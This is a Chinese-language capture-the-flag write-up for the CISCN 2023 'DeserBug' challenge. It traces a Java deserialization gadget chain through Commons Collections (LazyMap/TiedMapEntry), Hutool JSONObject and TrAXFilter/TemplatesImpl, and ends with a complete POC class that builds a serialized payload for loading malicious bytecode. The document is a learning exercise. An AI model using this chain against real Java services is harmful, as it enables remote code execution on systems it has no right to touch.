[CISCN 2023]—DeserBug
DeserBug
-
题目描述:
- cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept
-
附件
- 链接:https://pan.baidu.com/s/1lVABZUxmdEmXHL092P-efA?pwd=up9t
题目分析
题目中有两个类:Testapp、Myexpect
Testapp
本地8888端口开启服务,获取bugstr传参内容并进行反序列化
![[CISCN 2023]—DeserBug_第1张图片](http://img.e-com-net.com/image/info8/ecc266401e6d46a58d6a4ff2bf38c124.jpg)
根据依赖会想到CC反序列化,但题中给到的是CC3.2.2版本,CC自3.2.1后新添加了checkUnsafeSerialization功能对反序列化内容进行检测,而CC链常用到的InvokerTransformer就列入了黑名单中,不过题目给出了另一个类Myexpect
Myexpect
其中getAnyexcept定义了newInstance(),能够实例化一个单参数类
![[CISCN 2023]—DeserBug_第2张图片](http://img.e-com-net.com/image/info8/2e551531ff224802bb859cfc1f1097d3.jpg)
结合newInstance可以联想到TrAXFilter,借此实现Templates动态加载恶意字节码
![[CISCN 2023]—DeserBug_第3张图片](http://img.e-com-net.com/image/info8/561cd3aede39436dbb6a09bda70a3acb.jpg)
getAnyexcept
接下来就是要找哪里调用了getAnyexcept,根据提示从cn.hutool.json.JSONObject.put查找
cn.hutool.json.JSONObject.put->com.app.Myexpect#getAnyexcept
经过一级级调用发现在PropDesc#getValue(),经过反射调用bean的getter方法
![[CISCN 2023]—DeserBug_第4张图片](http://img.e-com-net.com/image/info8/87b453de04df4bbda8e71205f11b2f1a.jpg)
调用栈
getValue:154, PropDesc (cn.hutool.core.bean)
lambda$copy$0:66, BeanToMapCopier (cn.hutool.core.bean.copier)
accept:-1, 846238611 (cn.hutool.core.bean.copier.BeanToMapCopier$$Lambda$13)
forEach:684, LinkedHashMap (java.util)
copy:48, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:16, BeanToMapCopier (cn.hutool.core.bean.copier)
copy:92, BeanCopier (cn.hutool.core.bean.copier)
beanToMap:713, BeanUtil (cn.hutool.core.bean)
mapFromBean:264, ObjectMapper (cn.hutool.json)
map:114, ObjectMapper (cn.hutool.json)
<init>:210, JSONObject (cn.hutool.json)
<init>:187, JSONObject (cn.hutool.json)
wrap:805, JSONUtil (cn.hutool.json)
set:393, JSONObject (cn.hutool.json)
set:352, JSONObject (cn.hutool.json)
put:340, JSONObject (cn.hutool.json)
put:32, JSONObject (cn.hutool.json)
put
接着就要看哪里调用了put,这里直接结合CC6的前半段即可
put:32, JSONObject (cn.hutool.json)
get:159, LazyMap (org.apache.commons.collections.map)
getValue:74, TiedMapEntry (org.apache.commons.collections.keyvalue)
hashCode:121, TiedMapEntry (org.apache.commons.collections.keyvalue)
hash:339, HashMap (java.util)
readObject:1413, HashMap (java.util)
POC
import cn.hutool.json.JSONObject;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import javax.xml.transform.Templates;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import static com.app.Tools.getBytes;
import static com.app.Tools.setFieldValue;
import static com.app.Tools.*;
public class POC {
public static void main(String[] args) throws Exception {
byte[] bytes = getBytes("Evil");
TemplatesImpl templates = new TemplatesImpl();
setFieldValue(templates, "_name", "Sentiment");
setFieldValue(templates, "_class", null);
setFieldValue(templates, "_bytecodes", new byte[][]{bytes});
Myexpect myexpect = new Myexpect();
myexpect.setTargetclass(TrAXFilter.class);
myexpect.setTypeparam(new Class[]{Templates.class});
myexpect.setTypearg(new Object[]{templates});
JSONObject jsonObject = new JSONObject();
ConstantTransformer transformer = new ConstantTransformer(1);
Map outerMap = LazyMap.decorate(jsonObject,transformer);
TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap , "Sentiment");
HashMap hashMap = new HashMap();
hashMap.put(tiedMapEntry, "1");
jsonObject.remove("Sentiment");
setFieldValue(transformer,"iConstant",myexpect);
byte[] serialize = serialize(hashMap);
System.out.println(Base64.getEncoder().encodeToString(serialize));
//unserialize(serialize);
}
}